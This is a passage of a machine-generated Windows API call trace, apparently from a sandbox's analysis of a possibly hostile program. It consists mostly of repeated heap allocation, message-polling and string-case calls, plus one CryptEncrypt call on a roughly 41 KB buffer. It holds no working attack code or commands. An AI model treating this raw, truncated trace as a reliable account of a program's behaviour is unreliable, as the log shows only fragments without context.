Size=0x4) returned 0x24b17c8 [0252.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.276] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0252.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.277] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.277] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.278] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.278] CharLowerBuffW (in: lpsz="byte[41648]", cchLength=0xb | out: lpsz="byte[41648]") returned 0xb [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0252.278] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.279] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.279] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.279] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.279] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.280] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.280] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.280] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.280] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b7a48*, pdwDataLen=0x8bef68*=0xa2ab, dwBufLen=0xa2b0 | out: pbData=0x24b7a48*, pdwDataLen=0x8bef68*=0xa2b0) returned 1 [0252.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0252.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0252.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0252.281] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0252.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0252.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.281] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.282] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.282] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.282] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.282] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0252.282] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0252.283] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0252.283] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.283] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0252.283] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.283] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0252.283] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0252.283] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.284] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0252.284] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.284] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.284] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.284] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0252.284] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.284] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.285] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.285] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.285] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.285] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.285] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.285] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 